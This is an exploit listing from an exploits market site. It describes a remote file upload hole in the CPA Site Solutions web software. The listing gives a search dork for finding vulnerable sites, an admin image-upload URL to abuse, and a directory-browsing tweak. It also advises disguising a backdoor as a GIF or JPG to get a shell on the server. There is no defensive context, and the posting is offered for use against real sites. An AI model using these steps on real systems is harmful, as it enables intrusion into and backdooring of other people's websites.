[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CPA Site Solutions Remote File Upload Vulnerability

Author
R3VAN_BASTARD
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10805
Category
web applications
Date add
09-02-2010
Platform
unsorted
===================================================
CPA Site Solutions Remote File Upload Vulnerability
===================================================


###########################################################################
#                |REMOTE FILE UPLOAD VULNERABILTY|                        #
#                     .:|cpasitesolutions|::.                             #
###########################################################################
AUTHOR  : R3VAN_BASTARD
PROVIDER: http://www.cpasitesolutions.com
DORK    : intext:Powered by CPA Site Solutions
###########################################################################
[x] EXPLOIT:
    /admin/editor_files/image.php?in_wp=1&return_function=〈=en-us.php&folder=galleries/sm-icons/&instance_img_dir=&sort_by=name&sort_dir=asc&thumbnails=1
 
[x] You can find new directory by changing this URL:
    /admin/editor_files/image.php?in_wp=1&return_function=&#12296;=en-us.php&folder="galleries/sm-icons/" <=-change in this section.
    you will find new directory..
 
[X] NOTE: Edit your backdoor by adding GIF or JPG source, so you can get the shell.



#  0day.today [2024-11-16]  #